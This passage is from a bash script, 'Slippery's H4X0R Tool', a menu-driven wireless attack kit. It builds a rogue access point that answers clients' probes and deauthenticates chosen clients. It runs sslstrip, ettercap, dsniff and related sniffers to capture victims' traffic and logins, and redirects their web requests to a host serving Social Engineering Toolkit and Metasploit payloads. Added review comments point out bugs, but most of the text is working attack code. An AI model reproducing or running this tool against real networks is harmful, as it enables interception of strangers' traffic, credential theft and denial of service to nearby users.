   xterm -bg black -fg blue -T "sslstrip" -e sslstrip -a -k -f -l 8080 &>/dev/null &
   sleep 1;
   xterm -bg black -fg blue -T "sslstrip log" -e tail -f sslstrip.log &>/dev/null &
   ;;
 "2")
   echo "Setting up driftnet";
   xterm -bg black -fg blue -T "driftnet" -e driftnet -v -i "$IFACE" &>/dev/null & 
   ;;
 "3")
   echo "Setting up urlsnarf";
   xterm -bg black -fg blue -T "urlsnarf" -e urlsnarf -i "$IFACE" &>/dev/null & 
   ;;
 "4")
   echo "Setting up dsniff";
   xterm -bg black -fg blue -T "dsniff" -e dsniff -m -i "$IFACE" -d -s 4096 -w dsniff$(date +%F-%H%M).log &>/dev/null &  
   ;;
 "5")
   echo "Setting up webspy";
   # Nothing checks that CLIENT was set before this runs.
   xterm -bg black -fg blue -T "webspy" -e webspy -i "$IFACE" "$CLIENT" &>/dev/null &
   sleep 2;
   mozilla &
   ;;
 "6")
   echo "******************************************************************";
   echo "What other sniffing tools are you planning to use? Email me slippery@shellium.org";
   xterm -bg black -fg blue &>/dev/null &
   echo "******************************************************************";
   ;;
 "7")
   attackmenu;
   ;;
 "8")
   echo "******************************************************************";
   echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********";
   echo "******************************************************************";
   cleanup;
   exit 0
   ;;
 "9")
   echo "******************************************************************";
   echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********";
   echo "******************************************************************";
   # Leaves arpspoof, ettercap, the nat rule and ip_forward in place.
   firefox http://xslipperyh4x0r.blogspot.com/2010/10/slipperys-h4x0r-tool.html
   exit 0
   ;;
 esac
done
}

# Defines if you want to sniff or attack the subnet
function qsubnet(){
# Dispatches to sniffsn or attacksn based on a typed answer. Globals read:
# SUBNET. Globals written: SN.
# NOTE: exits with status 0 on bad input; by this point subnetscript and
# arpsetup have already flushed iptables, enabled forwarding, changed the
# MAC and started arpspoof, none of which is undone here.
clear;
echo "Do you want to sniff or attack the subnet of "$SUBNET"? (sniff or attack)";
read SN;
if [ "$SN" == "sniff" ];then
  sniffsn;
elif [ "$SN" == "attack" ];then
  attacksn;
else 
  echo "******************************************************************";
  echo "Enter 'sniff' or 'attack' only!!!";
  exit 0
fi
}

# Script to gain information to create a Rogue AP!
function rogueapscript(){
# Interactive setup for the Rogue AP section. Mirrors subnetscript (tool
# checks, firewall reset, ip_forward, `ip route` parsing) and then wepcrack
# (monitor mode, MAC change, injection test) before calling qrogueap.
# Globals written: IFACE, IFACEIP, GW, WIFACE, MIFACE, AP, CH, MAC, MTU.
# NOTE: every `read` is without -r and unvalidated. MTU is read but not
# used anywhere in this function — presumably consumed by apsetup/qrogueap,
# which are not in this excerpt; confirm.
clear;
echo "******************************************************************";
echo "!!! Make sure the interface used to create the Rogue AP is connected before running this script, and that you are connected to the internet with a different interface !!!";
echo
echo "Checking if the correct programs are installed..........";
# NOTE: "Abort" only prints — nothing exits. `locate` checks reflect the
# locate database, not what is installed right now.
type -P dhcpd3 &>/dev/null || { echo "I require dhcpd3 but it's not installed.  Abort.";}
type -P aircrack-ng &>/dev/null || { echo "I require aircrack-ng but it's not installed.  Abort.";}
type -P xterm &>/dev/null || { echo "I require xterm but it's not installed.  Abort.";}
type -P iptables &>/dev/null || { echo "I require iptables but it's not installed.  Abort.";}
type -P ettercap &>/dev/null || { echo "I require ettercap for sniffing but it's not installed.";}
type -P sslstrip &>/dev/null || { echo "I require sslstrip for a sniffing tool but it's not installed.";}
type -P driftnet &>/dev/null || { echo "I require driftnet for a sniffing tool but it's not installed.";}
type -P urlsnarf &>/dev/null || { echo "I require urlsnarf for a sniffing tool but it's not installed.";}
type -P dsniff &>/dev/null || { echo "I require dsniff for a sniffing tool but it's not installed.";}
type -P python &>/dev/null || { echo "I require python for certain tools but it's not installed.";}
type -P macchanger &>/dev/null || { echo "I require macchanger to spoof your mac address but it's not installed.";}
type -P msfconsole &>/dev/null || { echo "I require metasploit for an attack tool but it's not installed.";}
locate set_config &>/dev/null || { echo "I require Social Engineering Toolkit for an attack tool but it's not installed.";}
locate fast-track.py &>/dev/null || { echo "I require fast-track.py for an attack tool but it's not installed.";}
locate SimpleHTTPServer &>/dev/null || { echo "I require SimpleHTTPServer for an attack tool but it's not installed.";}
echo "******************************************************************";
echo "Activating IP Forwarding and killing old Rogue AP processes if they exist";
echo "******************************************************************";
echo "Note: I'm not killing certian tools as you may have them open and waiting before you run this script";
airmon-ng stop mon0 &>/dev/null; # Just incase you were already using monitor mode
airmon-ng stop mon1 &>/dev/null; # If you happen to of had a 4th interface or
airmon-ng stop mon2 &>/dev/null; # if your interface isn't mon0-3 please edit
airmon-ng stop mon3 &>/dev/null; # this to what you have, ONLY EDIT HERE!!
# NOTE: backgrounded name-based killall; also kills every xterm and `tail`
# on the system, and may still be running when the commands below start.
killall -q dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf dsniff xterm tail &>/dev/null & # Should kill all programs that may interfere with this script
# NOTE: wipes the host's entire iptables configuration without saving it;
# nothing in this file restores it.
iptables --flush; # Makes sure your iptables are clear
iptables --table nat --flush; # Makes sure your iptables are clear
iptables --delete-chain; # Makes sure your iptables are clear
iptables --table nat --delete-chain; # Makes sure your iptables are clear
# NOTE: system-wide setting, left enabled after the script exits.
echo 1 > /proc/sys/net/ipv4/ip_forward; # Sets IP forwarding
echo "******************************************************************";
# Same `ip route` assumptions as subnetscript: first printed route is the
# link-scope one and exactly one route carries `via`/`src`. On a host that
# prints `default via ...` first, IFACE would hold the gateway IP — verify.
IFACE=`ip route  | awk '{print $3}' | sed q`; # Finds your interface
echo "Using "$IFACE" as your internet connected interface";
echo "******************************************************************";
IFACEIP=`ip route | grep src | awk '{print $9}'`; # Finds your IP
echo "Using "$IFACEIP" as your IP address for "$IFACE"";
echo "******************************************************************";
GW=`ip route | grep via | awk '{print $3}'`; # Finds your Gateway IP
echo "Using "$GW" for the Gateway address for "$IFACE"";
echo "******************************************************************";
echo "Enter the Interface used to create the Rogue AP (Ex. wlan0, wlan1)";
read WIFACE;
echo "Using "$WIFACE" to create the Rouge AP";
ifconfig "$WIFACE" up;
echo "******************************************************************";
airmon-ng start "$WIFACE" &>/dev/null;
# NOTE: same multi-interface problem as in wepcrack — several UNSPEC lines
# leave MIFACE holding several names.
MIFACE=`ifconfig | grep UNSPEC | awk '{ print $1}' | cut -c 1-4`; # Finds your monitor interface from the selected Rogue AP interface - Note: If you see mutiple monitor interfaces then you need to edit above where it talks about killing monitor interfaces and insert the monitor interface you use.
echo "Using "$MIFACE" as your monitor interface";
echo "******************************************************************";
iwlist "$WIFACE" scan | grep -E 'Address:|Channel:|ESSID:'; # Scans for local WiFi networks
echo
echo "^^^Above are some local WiFi networks^^^";
echo "******************************************************************";
echo "Enter the name of your Rogue AP";
read AP;
echo "Using "$AP" for Rogue AP name";
echo "******************************************************************";
echo "Enter the channel number for your Rogue AP (1,2,3,4,5,6,7,8,9)";
read CH;
echo "Using "$CH" for Rogue AP channel";
echo "******************************************************************";
echo "Enter the MAC for your Rogue AP (Ex: 0A:1B:2C:3D:4E:5F)";
read MAC;
echo "Using "$MAC" for Rogue AP MAC address";
echo "******************************************************************";
echo "Select your MTU setting (1400, 1500 or maybe 1800??)";
read MTU;
echo "Using "$MTU", If you have problems try a different setting";
echo "******************************************************************";
echo "Restarting "$WIFACE" and changing the MAC address to "$MAC" on "$MIFACE"";
# Unlike wepcrack, monitor mode is restarted here without a channel; CH is
# passed to airbase-ng later instead. The interface is left in monitor mode
# with the spoofed MAC; nothing in this excerpt reverts it.
airmon-ng stop "$MIFACE" &>/dev/null;
airmon-ng stop "$WIFACE" &>/dev/null;
ifconfig "$WIFACE" down;
ifconfig "$WIFACE" up;
airmon-ng start "$WIFACE" &>/dev/null;
ifconfig "$MIFACE" down;
sleep 2;
macchanger -m "$MAC" "$MIFACE";
ifconfig "$MIFACE" up;
# Purpose of loading tun here is not evident from this function — TODO confirm.
modprobe tun;
echo "******************************************************************";
echo "Testing "$MIFACE" for injection";
xterm -hold -bg black -fg blue -T "Injection Test" -e aireplay-ng --test "$MIFACE" &>/dev/null &
sleep 7;
# Only aireplay-ng is killed; with -hold the test xterm stays open.
killall -q aireplay-ng;
echo "******************************************************************";
qrogueap;
}

#Sends you to the correct function if your copying someone's AP
function mirror(){
# Asks whether the AP being copied uses WEP and routes to weprogueap (with
# a key) or rogueap. Globals read: AP. Globals written: WEP, WEPKEY.
# NOTE: the entered key is echoed back in clear text, so it ends up in the
# terminal scrollback and in any session log. `read` is without -r.
# The caller (qrogueap) is not in this excerpt.
echo "Are you mirroring "$AP", and do they have WEP encryption? (yes or no)";
read WEP;
if [ "$WEP" == "yes" ];then
  echo "Enter their WEP key now";
  read WEPKEY;
  echo "Using "$WEPKEY" for "$AP"'s WEP key";
  weprogueap;
elif [ "$WEP" == "no" ];then
  rogueap;
else
  echo "******************************************************************";
  echo "Enter 'yes' or 'no' only!!!";
  # NOTE: exit status 0 on bad input, with monitor mode and the changed
  # MAC from rogueapscript left in place.
  exit 0
fi
}

# Starts the open (unencrypted) rogue AP with airbase-ng in its own xterm.
# "let" runs a plain AP for ESSID $AP on channel $CH; "help" adds -P -C 30
# (airbase-ng's probe-response options, see its man page) so clients probing
# for other networks are answered as well.
# Reads: AP, CH, MIFACE. Any other answer ends the script; otherwise waits
# 5 s for the AP and hands over to apsetup.
function rogueap(){
clear;
echo "Do you want to let users connect, or help users to connect to $AP? (let or help)";
read CON;
local -a probe_opts=()
local status_line
case "$CON" in
  let)
    status_line="Letting the clients connect to $AP";
    ;;
  help)
    probe_opts=(-P -C 30);
    status_line="Helping clients to connect to $AP";
    ;;
  *)
    echo "******************************************************************";
    echo "Enter 'let' or 'help' only!!!";
    exit 0
    ;;
esac
echo "******************************************************************";
echo "Building your $AP Rogue AP....";
# probe_opts is empty in "let" mode, so the argv is identical to the plain form
xterm -hold -bg black -fg blue -T "$AP" -e airbase-ng "${probe_opts[@]}" -e "$AP" -c "$CH" -v "$MIFACE" &>/dev/null &
echo "******************************************************************";
echo "$status_line";
echo "******************************************************************";
echo "Waiting a few seconds for $AP to be established";
sleep 5;
apsetup;
}

# Starts the WEP-encrypted rogue AP (the mirrored network's key) with
# airbase-ng in its own xterm. "let" runs a plain AP; "help" adds -P -C 30
# (airbase-ng's probe-response options, see its man page).
# Reads: AP, CH, WEPKEY, MIFACE. Note that the WEP key travels on the
# airbase-ng command line and is therefore visible in `ps` to local users.
# Any other answer ends the script; otherwise waits 5 s and calls apsetup.
function weprogueap(){
clear;
echo "Do you want to let users connect, or help users to connect to $AP? (let or help)";
read CON;
local -a probe_opts=()
local status_line
case "$CON" in
  let)
    status_line="Letting the clients connect to $AP";
    ;;
  help)
    probe_opts=(-P -C 30);
    status_line="Helping clients to connect to $AP";
    ;;
  *)
    echo "******************************************************************";
    echo "Enter 'let' or 'help' only!!!";
    exit 0
    ;;
esac
echo "******************************************************************";
echo "Building your $AP Rogue AP....";
xterm -hold -bg black -fg blue -T "$AP" -e airbase-ng "${probe_opts[@]}" -e "$AP" -c "$CH" -w "$WEPKEY" -v "$MIFACE" &>/dev/null &
echo "******************************************************************";
echo "$status_line";
echo "******************************************************************";
echo "Waiting a few seconds for $AP to be established";
sleep 5;
apsetup;
}

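# Sets up the Rogue AP's iptables and dhcp server.
# Brings up the at0 tap interface airbase-ng created, masquerades it out of
# $IFACE, installs the port-80 rule for the chosen mode and starts a DHCP
# server for the 10.0.0.0/24 client network.
# Reads: DO ("sniff" or "attack"), MTU, IFACE, IFACEIP, GW, AP.
# Side effects: overwrites /etc/dhcp3/dhcpd.conf and the lease file, appends
# iptables rules, launches two xterms.
# Exits with status 1 if DO is invalid. The check now runs before anything
# is touched; previously it came after the interface and NAT rules were
# already configured, so a typo left a half-built setup behind.
function apsetup(){
case "$DO" in
  sniff|attack) ;;
  *)
    echo "******************************************************************";
    echo "Enter 'sniff' or 'attack' only!!!";
    exit 1
    ;;
esac
ifconfig at0 up;
ifconfig at0 mtu "$MTU";
ifconfig at0 10.0.0.1 netmask 255.255.255.0;
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1;
echo "******************************************************************";
echo "$AP should be running now!";
echo "******************************************************************";
echo "Setting up the iptables";
# NOTE(review): a FORWARD policy of ACCEPT opens forwarding on every
# interface, not only at0; the explicit at0 rule two lines down is what the
# rogue AP actually needs.
iptables -P FORWARD ACCEPT;
iptables --table nat --append POSTROUTING --out-interface "$IFACE" -j MASQUERADE;
iptables --append FORWARD --in-interface at0 -j ACCEPT;
if [ "$DO" == "sniff" ];then
  # HTTP from the AP's clients goes to port 8080, where sslstrip listens once
  # it is started from the sniff menu. The rule is limited to at0 like the
  # attack rule below, so port-80 traffic entering on $IFACE is not caught.
  iptables -t nat -A PREROUTING -i at0 -p tcp --dport 80 -j REDIRECT --to-port 8080;
else
  # attack: every client HTTP request is DNATed to this host ($IFACEIP)
  iptables -t nat -A PREROUTING -i at0 -p tcp --dport 80 -j DNAT --to "$IFACEIP";
fi
echo "******************************************************************";
echo "Setting up the DHCP server and running it";
echo "******************************************************************";
# Minimal authoritative config: ten leases, 10.0.0.1 as router, and $GW
# (set outside this function; presumably the upstream gateway) as DNS.
cat > /etc/dhcp3/dhcpd.conf <<EOF
ddns-update-style none;
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option domain-name-servers $GW;
range 10.0.0.10 10.0.0.20;
}
EOF
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd;
echo > /var/lib/dhcp3/dhcpd.leases;
xterm -hold -bg black -fg blue -e dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &> /dev/null &
echo "Launching DHCP entries log";
xterm -bg black -fg blue -T "DHCP log" -e tail -f /var/log/messages &>/dev/null &
}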

# Tears down what the script started: disables forwarding, kills the helper
# tools (killall matches by name, so any other xterm or tail the operator had
# open dies too), flushes both iptables tables, drops the monitor interface,
# blanks the dhcpd files the script wrote, then opens the project page.
# Reads: MIFACE, WIFACE. The in-place edits to /etc/etter.conf made in
# sniffap are not reverted here.
function cleanup(){
  local -a helpers=(arpspoof dhcpd3 airbase-ng aireplay-ng ettercap sslstrip driftnet urlsnarf dsniff xterm tail)
  local table
  clear;
  echo 0 > /proc/sys/net/ipv4/ip_forward;
  killall -q "${helpers[@]}" &>/dev/null &
  for table in filter nat; do
    iptables --table "$table" --flush;
    iptables --table "$table" --delete-chain;
  done
  airmon-ng stop "$MIFACE";
  airmon-ng stop "$WIFACE";
  ifconfig "$WIFACE" down;
  ifconfig "$WIFACE" up;
  # "echo >" leaves a single newline in each file, matching the original reset
  echo > /etc/dhcp3/dhcpd.conf;
  echo > /var/lib/dhcp3/dhcpd.leases;
  firefox http://xslipperyh4x0r.blogspot.com/2010/10/slipperys-h4x0r-tool.html
}

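#Sets up the sniffing methods and calls the Rogue AP function automatically
# Sniff mode: enables ettercap's iptables hooks in /etc/etter.conf, adds a
# UDP DNAT to $GW, builds the rogue AP through mirror, starts ettercap on at0
# and then loops over a menu of extra sniffers, deauth, or a switch to attack
# mode.
# Reads: GW, AP (plus whatever mirror, deauth and attackap read).
# Side effects: edits /etc/etter.conf in place (the untouched file is kept as
# /etc/etter.conf.bak; cleanup does not revert the edit), appends a nat rule,
# launches long-running xterms. Never returns: items 7-9 and an EOF on stdin
# all leave via exit.
function sniffap(){
clear;
echo "******************************************************************";
echo "Checking to see if your ready to run ettercap...";
echo "******************************************************************";
  # Uncomment redir_command_on/off so ettercap can add and remove its own
  # REDIRECT rules. The guard stops the edit repeating on later runs;
  # -i.bak on the first sed keeps a copy of the pre-edit file.
  if grep -q '#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"' /etc/etter.conf; then
    sed -i.bak 's/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf;
    sed -i 's/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf;
    echo "Uncommented your iptables in /etc/etter.conf for you :)";
  fi
# NOTE(review): this DNATs every UDP packet seen in PREROUTING -- any
# interface, any port -- to $GW, not only DNS from at0. If client DNS is what
# is meant, "-i at0 -p udp --dport 53" is the narrower rule; left as written
# until the intent is confirmed.
iptables -t nat -A PREROUTING -p udp -j DNAT --to "$GW";
mirror;
read -r -p "Press ENTER to start ettercap after you have someone connected to $AP"
# Targets are /$GW/ and // (ettercap's TARGET1/TARGET2 form); the log name
# carries a timestamp so reruns do not overwrite an earlier capture.
xterm -hold -bg black -fg blue -T "ettercap" -e sudo ettercap -T -q -p -l ettercap$(date +%F-%H%M).log -i at0 /"$GW"/ // &>/dev/null &
#sudo ettercap -G &>/dev/null &
sleep 7;
echo "******************************************************************";
echo "If ettercap is now sniffing then startup some other fun tools";
echo "******************************************************************";
  showMenu () {
 echo
 echo "1) sslstrip"
 echo "2) driftnet"
 echo "3) urlsnarf"
 echo "4) dsniff"
 echo "5) Add your own tool"
 echo "6) Deauth victim"
 echo "7) Stop sniffing and start attacking"
 echo "8) Exit and cleanup"
 echo "9) Exit and leave everything running"
 echo
}
while true
do
 showMenu
 # an EOF on stdin (Ctrl-D) used to make read fail and the menu reprint forever
 read -r CHOICE || exit 1
 case "$CHOICE" in
 "1")
   # sslstrip listens on 8080, where apsetup's sniff-mode REDIRECT sends
   # port-80 traffic; it writes sslstrip.log in the current directory, which
   # the second xterm tails.
   echo "Setting up sslstrip";
   xterm -bg black -fg blue -T "sslstrip" -e sslstrip -a -k -f -l 8080 &>/dev/null &
   sleep 1;
   xterm -bg black -fg blue -T "sslstrip log" -e tail -f sslstrip.log &>/dev/null &
  ;;
 "2")
   echo "Setting up driftnet";
   xterm -bg black -fg blue -T "driftnet" -e driftnet -v -i at0 &>/dev/null & 
  ;;
 "3")
   echo "Setting up urlsnarf";
   xterm -bg black -fg blue -T "urlsnarf" -e urlsnarf -i at0 &>/dev/null & 
  ;;
 "4")
   echo "Setting up dsniff";
   xterm -bg black -fg blue -T "dsniff" -e dsniff -m -i at0 -d -s 4096 -w dsniff$(date +%F-%H%M).log &>/dev/null &  
  ;;
 "5")
   # just opens an interactive shell window for whatever the operator wants
   echo "******************************************************************";
   echo "What other sniffing tools are you planning to use? Email me slippery@shellium.org";
   xterm -bg black -fg blue &>/dev/null &
   echo "******************************************************************";
  ;;
 "6")
   deauth;
  ;;
 "7")
   attackap;
  ;;
 "8")
   echo "******************************************************************";
   echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********";
   echo "******************************************************************";
   cleanup;
   exit 0
  ;;
 "9")
   echo "******************************************************************";
   echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********";
   echo "******************************************************************";
   firefox http://xslipperyh4x0r.blogspot.com/2010/10/slipperys-h4x0r-tool.html
   exit 0
  ;;
 *)
   # previously an unknown choice was silently ignored
   echo "Enter a number from 1 to 9";
  ;;
 esac
done
}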

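#Sets up the deauth method for your Rogue Ap
# Shows airodump-ng so the operator can pick a target, then sends aireplay-ng
# deauth frames at every client of an AP ("all") or at one client ("one").
# Reads: MIFACE (monitor interface). Writes: APMAC, CHAN, OA, DP, CMAC.
# Both branches now restart airodump-ng pinned to the target's channel and
# BSSID before injecting: the "all" branch used to read the channel but never
# use it, leaving the first airodump-ng channel-hopping on the same card
# while aireplay-ng expected it to stay on the AP's channel.
# Exits with status 1 on a malformed MAC, a non-numeric packet count, or an
# answer other than "all"/"one".
function deauth(){
local mac_re='^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
echo "******************************************************************";
xterm -hold -bg black -fg blue -T "airodump-ng" -e airodump-ng "$MIFACE" &>/dev/null &
echo "You should see a new window, let it run for 10 seconds.....";
sleep 10;
echo "You should now see some activity";
echo "******************************************************************";
echo "Enter the MAC of the network you wish to deauth";
read -r APMAC;
if [[ ! "$APMAC" =~ $mac_re ]]; then
  echo "$APMAC is not a MAC address (Ex: 0A:1B:2C:3D:4E:5F)";
  exit 1
fi
echo "Using $APMAC as the network to deauth";
echo "******************************************************************";
echo "Enter the channel of the network you wish to deauth";
read -r CHAN;
echo "Using channel $CHAN"
echo "******************************************************************";
echo "Do you want to deauth all clients or just 1 client? (all or one)";
read -r OA;
echo "******************************************************************";
echo "Enter the number of deauth packets to send, (5-10 normally) Note: 0 means to send them continuously";
read -r DP;
if [[ ! "$DP" =~ ^[0-9]+$ ]]; then
  echo "$DP is not a number";
  exit 1
fi
echo "******************************************************************";
case "$OA" in
  all|one) ;;
  *)
    echo "******************************************************************";
    echo "Enter 'all or 'one' only!!!";
    exit 1
    ;;
esac
# Replace the channel-hopping airodump-ng with one locked to the target so
# the card stays on that channel while aireplay-ng injects; the capture
# prefix carries a timestamp.
killall -q airodump-ng;
xterm -hold -bg black -fg blue -T "airodump-ng" -e airodump-ng -c "$CHAN" --bssid "$APMAC" -w airodump$(date +%F-%H%M).log "$MIFACE" &>/dev/null &
if [ "$OA" == "all" ];then
  echo "Deauthing all clients on $APMAC with $DP Packets";
  xterm -hold -bg black -fg blue -T "aireplay-ng" -e aireplay-ng --deauth "$DP" -a "$APMAC" "$MIFACE" &>/dev/null &
else
  echo "Enter the Client's MAC address connected to $APMAC";
  echo "******************************************************************";
  read -r CMAC;
  if [[ ! "$CMAC" =~ $mac_re ]]; then
    echo "$CMAC is not a MAC address (Ex: 0A:1B:2C:3D:4E:5F)";
    exit 1
  fi
  echo "******************************************************************";
  echo "Deauthing $CMAC on $APMAC with $DP Packets";
  echo "******************************************************************";
  xterm -hold -bg black -fg blue -T "aireplay-ng" -e aireplay-ng --deauth "$DP" -a "$APMAC" -c "$CMAC" "$MIFACE" &>/dev/null &
fi
}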

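#Sets up the attack methods for your Rogue AP
# Attack mode: a menu to start the payload-serving tools (a web server on
# port 80, SET, Metasploit, Fast-Track) and then launch the rogue AP through
# mirror, whose apsetup DNAT rule sends the clients' HTTP to this host.
# Reads: PWD (served by SimpleHTTPServer). Never returns: items 8 and 9 exit,
# and an EOF on stdin exits with status 1.
function attackap(){
clear;
echo "******************************************************************";
echo "You have choosen to attack, Select some tools to start attacking, then launch your Rogue AP";
echo "******************************************************************";
  showMenu () {
 echo
 echo "1) SimpleHTTPServer port 80"
 echo "2) Social Engineering Toolkit"
 echo "3) Metasploit"
 echo "4) Fast-Track"
 echo "5) Add your own tool"
 echo "6) Launch your Rogue AP"
 echo "7) Deauth victim"
 echo "8) Exit and cleanup"
 echo "9) Exit and leave everything running"
 echo 
}
while true
do
 showMenu
 # an EOF on stdin (Ctrl-D) used to make read fail and the menu reprint forever
 read -r CHOICE || exit 1
 case "$CHOICE" in
 "1")
   # Serves the whole current directory, recursively, to anyone on the AP --
   # start the script from a directory that holds only what you mean to serve.
   echo "Setting up SimpleHTTPServer on port 80 in $PWD";
   xterm -bg black -fg blue -T "SimpleHTTPServer" -e python -m SimpleHTTPServer 80 &>/dev/null &
   sleep 3;
  ;;
 "2")
   # "cd ... && xterm ... &" runs as one background list in a subshell, so the
   # script's own working directory is unchanged; if the cd fails the tool is
   # simply not started (cd prints its own error).
   echo "Setting up Social Engineering Toolkit";
   cd /pentest/exploits/SET && xterm -bg black -fg blue -T "Social Engineering Toolkit" -e ./set &>/dev/null &
   sleep 10;
  ;;
 "3")
   echo "Setting up Metasploit.........";
   cd /pentest/exploits/framework3 && xterm -bg black -fg blue -T "Metasploit" -e ./msfconsole &>/dev/null &
   sleep 2;
   echo "Few more seconds......";
   sleep 15;
  ;;
 "4")
   echo "Setting up Fast-Track";
   cd /pentest/exploits/fasttrack/ && xterm -bg black -fg blue -T "Fast-Track" -e ./fast-track.py -i &>/dev/null &
   sleep 10; 
  ;;
 "5")
   # just opens an interactive shell window for whatever the operator wants
   echo "******************************************************************";
   echo "What other attacks are you planning? Email me slippery@shellium.org";
   xterm -bg black -fg blue &>/dev/null &
   echo "******************************************************************";
  ;;
 "6")
   mirror;
  ;;
 "7")
   deauth;
  ;;
 "8")
   echo "******************************************************************";
   echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********";
   echo "******************************************************************";
   cleanup;
   exit 0
  ;;
 "9")
   echo "******************************************************************";
   echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********";
   echo "******************************************************************";
   firefox http://xslipperyh4x0r.blogspot.com/2010/10/slipperys-h4x0r-tool.html
   exit 0
  ;;
 *)
   # previously an unknown choice was silently ignored
   echo "Enter a number from 1 to 9";
  ;;
 esac
done
}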

# Asks whether the rogue AP is used for sniffing or attacking and dispatches
# to sniffap or attackap. Reads: AP. Writes: DO (global; apsetup reads it to
# choose its port-80 rule). Any other answer ends the script.
function qrogueap(){
clear;
echo "Do you want to sniff or attack $AP? (sniff or attack)";
read DO;
case "$DO" in
  sniff)
    sniffap;
    ;;
  attack)
    attackap;
    ;;
  *)
    echo "******************************************************************";
    echo "Enter 'sniff' or 'attack' only!!!";
    exit 0
    ;;
esac
}

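#Start Menu
# Prints the top-level menu. Refuses to run unless the caller is root: the
# previous check ran `exit` inside a ( ) subshell, which only left the
# subshell, so the warning was printed and the script carried on regardless.
# Exits with status 1 (not 0) on that error path.
showMenu () {
 if [ "$(whoami)" != 'root' ]; then
   echo "YOU MUST RUN THIS AS ROOT" >&2
   exit 1
 fi
 echo
 echo "*******Please select a choice below*******"
 echo "1) H4X0R a network your already connected to"
 echo "2) Create a Rogue Ap and H4X0R it"
 echo "3) Crack WEP"
 echo "4) Need Help?"
 echo "5) Update Tools"
 echo 
}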
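# Main loop: show the start menu and dispatch on the operator's choice.
# Runs until one of the callees exits the script (or stdin hits EOF, which
# used to make read fail and the menu reprint forever).
while true
do
 showMenu
 read -r CHOICE || exit 1
 case "$CHOICE" in
 "1")
   subnetscript;  
  ;;
 "2")
   rogueapscript;
  ;;
 "3")
#Have only 1 tool uncommented below (use the apt-get line only to install wifite witch is my favorite tool btw...)#
# apt-get update && apt-get install wifite #
   wepcrack;
   #grimwepa &
   #sh -c "python wifite.py; sudo -s" &
  ;;
 "4")
   firefox http://xslipperyh4x0r.blogspot.com/2010/10/slipperys-h4x0r-tool.html
  ;;
 "5")
   echo "Updating tools......"
   # Each update runs in its own subshell: a missing checkout no longer runs
   # "svn up" in whatever the current directory happens to be (the original
   # chained "cd dir; svn up"), and the script's working directory -- which
   # option 1 of attack mode serves over HTTP -- is left unchanged.
   # NOTE(review): these fetch code over the network and run it as root with
   # no integrity check visible here.
   ( cd /pentest/wireless/aircrack-ng/ && svn up )
   ( cd /pentest/exploits/framework3/ && svn up )
   ( cd /pentest/exploits/SET/ && ./set-update )
   ( cd /pentest/exploits/fasttrack/ && svn up )
   ( cd /pentest/wireless/wifite/ && python wifite.py -upgrade )
  ;;
 *)
   echo "Enter a number from 1 to 5"
  ;;
 esac
done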